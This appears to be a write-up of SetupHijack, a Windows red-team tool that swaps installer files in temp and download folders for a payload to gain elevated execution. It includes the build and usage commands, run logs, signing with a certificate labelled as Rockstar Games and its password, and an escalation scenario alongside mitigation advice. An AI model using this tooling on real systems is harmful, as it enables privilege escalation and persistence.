SetupHijack is a Windows security research and red team proof-of-concept that exploits insecure installer and updater file handling. The tool monitors common drop locations such as %TEMP%, %APPDATA% and %USERPROFILE%\\Downloads and attempts to replace installer files with a supplied payload before a higher-privileged process executes them. It is written for authorised testing and defensive validation in controlled environments.
Features
- Scans common installer drop locations and substitutes detected installer files with a provided payload, optionally preserving the original as a
.bakfile. - Operates from a low-privilege account and does not require elevated permissions to run.
- Flags to disable scanning of specific locations and a clean mode to restore backups.
- Includes a code-signing helper demonstration intended to improve substitution success rates against simple Authenticode checks.
- Build scripts and example outputs are included for lab reproduction.
Installation
The repository uses a Microsoft build toolchain and includes build scripts and a Makefile. Follow the README for full prerequisites and environment notes. The README documents the build step as follows (verbatim):
nmake PAYLOAD=c:\Users\YourUser\Desktop\payload.exe |
Ensure you have a supported Visual C++ build environment, such as Visual Studio Build Tools or the Platform Build Tools available on PATH. The README includes helper batch files and additional environment notes; consult the repository for complete prerequisites and optional code signing helper utilities.
Usage
The README provides documentation of the runtime options:
<code>SetupHijack.exe # Scan %TEMP%, %APPDATA%, and %USERPROFILE%\Downloads (default)<br> SetupHijack.exe -notemp # Disable scanning %TEMP%<br> SetupHijack.exe -noappdata # Disable scanning %APPDATA%<br> SetupHijack.exe -nodownloads # Disable scanning %USERPROFILE%\Downloads<br> SetupHijack.exe clean # Clean mode (restores .bak backups in all enabled locations)<br> SetupHijack.exe verbose # Verbose mode (log all actions)<br> SetupHijack.exe <payload.exe> # Use specified payload for .exe (unless argument is a recognized option)</code> |
- Run
SetupHijack.exebefore or during a privileged install or update process to attempt substitution. - The tool scans
%TEMP%,%APPDATA%, and%USERPROFILE%\\Downloadsby default, use flags to disable specific locations. - The
cleanflag restores backups created by the tool;verboseincreases logging.
Example output
The repository includes example build and run logs showing compilation, payload substitution, and execution. An excerpt reproduced from the README validates the build and run flow:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 |
C:\Users\Fantastic\Desktop\Sayuri\InfectElevatedSetups>nmake PAYLOAD="C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe" Microsoft (R) Program Maintenance Utility Version 14.29.30159.0 Copyright (C) Microsoft Corporation. All rights reserved. powershell -Command "(Get-Content SetupHijack.cpp) -replace '#define PAYLOAD_PATH L\".*\"', '#define PAYLOAD_PATH L\"%ESCAPED_PAYLOAD%\"' | Set-Content SetupHijack.cpp" cl /nologo /W4 /EHsc /DUNICODE /D_UNICODE /MT /O2 /c SetupHijack.cpp SetupHijack.cpp SetupHijack.cpp(318): warning C4189: 'hr2': local variable is initialized but not referenced taskkill /f /im SetupHijack.exe 2>nul powershell -Command "Start-Sleep -Milliseconds 500" link /nologo /SUBSYSTEM:CONSOLE /ENTRY:wmainCRTStartup /NODEFAULTLIB:MSVCRT /NODEFAULTLIB:MSVCPRT /OUT:SetupHijack.exe SetupHijack.obj kernel32.lib user32.lib shlwapi.lib Shell32.lib /MANIFEST /MANIFESTFILE:SetupHijack.exe.manifest copy /y install.wxs.template install.wxs 1 file(s) copied. powershell -Command "(Get-Content install.wxs) -replace 'Source=\"PAYLOAD_PLACEHOLDER\"', 'Source=\"%ESCAPED_PAYLOAD%\"' | Set-Content install.wxs" wix build install.wxs -o install.msi Generating install.bat with payload C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe Generating launch_payload.bat with payload C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe powershell -Command "(Get-Content install.wxs) -replace '(<File Id=\"RengeExeFile\" Source=\").*?(\" KeyPath=\"yes\"/>)', '`%ESCAPED_PAYLOAD%`' | Set-Content install.wxs" call sign_random.bat Using CERT: [certs\rockstar1.pfx] Using PASS: [C!EZxYUxVGPzQDj3] The following certificate was selected: Issued to: Rockstar Games, Inc. Issued by: Entrust Code Signing CA - OVCS1 Expires: Thu Mar 20 17:16:13 3000 SHA1 hash: C9793F4A2E629D88F2213622D7A0C170D9C7CBC6 Done Adding Additional Store Successfully signed: SetupHijack.exe Number of files successfully Signed: 1 Number of warnings: 0 Number of errors: 0 The following certificate was selected: Issued to: Rockstar Games, Inc. Issued by: Entrust Code Signing CA - OVCS1 Expires: Thu Mar 20 17:16:13 3000 SHA1 hash: C9793F4A2E629D88F2213622D7A0C170D9C7CBC6 Done Adding Additional Store Successfully signed: install.msi Number of files successfully Signed: 1 Number of warnings: 0 Number of errors: 0 C:\Users\Fantastic\Desktop\Sayuri\InfectElevatedSetups>SetupHijack.exe [2025-09-24 15:20:46] [SetupHijack] Using payload: C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe [2025-09-24 15:20:46] [SetupHijack] If infecting .msi, will use: install.msi [2025-09-24 15:20:46] [SetupHijack] Polling enabled locations recursively for .exe, .msi, .bat: [2025-09-24 15:20:46] - C:\Users\FANTAS~1\AppData\Local\Temp [2025-09-24 15:20:46] - C:\Users\Fantastic\AppData\Roaming [2025-09-24 15:20:46] - C:\Users\Fantastic\Downloads [2025-09-24 15:20:46] [SetupHijack] Entering infection loop. [2025-09-24 15:20:59] [SetupHijack] Total infections this session: 0 [2025-09-24 15:21:13] [SetupHijack] Replaced C:\Users\FANTAS~1\AppData\Local\Temp\installcmd.bat with payload install.bat, backup: C:\Users\FANTAS~1\AppData\Local\Temp\installcmd.bat.bak [2025-09-24 15:21:13] [SetupHijack] New infections this run: 1 [2025-09-24 15:21:22] [SetupHijack] Replaced C:\Users\Fantastic\Downloads\installcmd.msi with payload install.msi, backup: C:\Users\Fantastic\Downloads\installcmd.msi.bak [2025-09-24 15:21:26] [SetupHijack] New infections this run: 1 [2025-09-24 15:21:26] [SetupHijack] Total infections this session: 2 [2025-09-24 15:21:41] [SetupHijack] Replaced C:\Users\Fantastic\AppData\Roaming\InsecureApp\setup.exe with payload C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\Fantastic\AppData\Roaming\InsecureApp\setup.exe.bak [2025-09-24 15:21:41] [SetupHijack] New infections this run: 1 [2025-09-24 15:21:53] [SetupHijack] Total infections this session: 3 |
Refer to the repository for the full example outputs and additional build traces.
Offensive scenario
After obtaining a low-privilege foothold on a Windows host, an operator compiles SetupHijack with a follow-on payload and runs the binary in the background. When an administrator later runs an updater that writes a temporary installer into %TEMP% and executes it without a robust integrity check, the substituted payload executes with the elevated context of the installer. The operator can then use the elevated process to extract credentials, enable persistence, or move laterally. The repository’s README demonstrates a lab flow that includes build, start, and trigger steps, suitable for reproduction.
Detection and mitigation
SetupHijack abuses insecure installer handling and race conditions. Practical mitigations include:
- Require and validate Authenticode signing before executing installers. Enforce signature checks at execution time.
- Avoid executing binaries from world-writable locations such as
%TEMP%. Use secure per-installer directories or Windows Installer service patterns that avoid unsafe temporary drops. - Monitor for unexpected rapid replace or rename events in installer drop locations during installer execution windows and correlate file system events with process launches.
- Implement file integrity monitoring for installer artifacts and alert on unauthorized modifications.
- Restrict which installers may be executed through endpoint control policies and require attestation for installer binaries where feasible.
Related tools and articles
For defensive context and related techniques, consider these Darknet articles:
- UACMe – Defeat Windows User Account Control — background on User Account Control bypass techniques and why installers can be an escalation vector.
- Windows_EndPoint_Audit – Endpoint Security Auditing Toolkit — automated checks for services, registry, and file permissions that help defenders validate controls against installer abuse.
- BDFProxy – Patch Binaries via MiTM — shows binary patching via man-in-the-middle approaches and highlights related risks when installers are fetched over the network without integrity checks.
- mitmproxy – Intercepting HTTP Proxy Tool — useful for defenders to emulate and inspect installer download flows in test environments.
Conclusion
SetupHijack is a compact, well-documented proof of concept for exploiting insecure installer and updater file handling on Windows. It is helpful in red teams for testing local escalation and persistence controls and useful to defenders for validating detection and hardening strategies. Use it only with explicit permission and in isolated environments.
You can read more or download SetupHijack here: https://github.com/hackerhouse-opensource/SetupHijack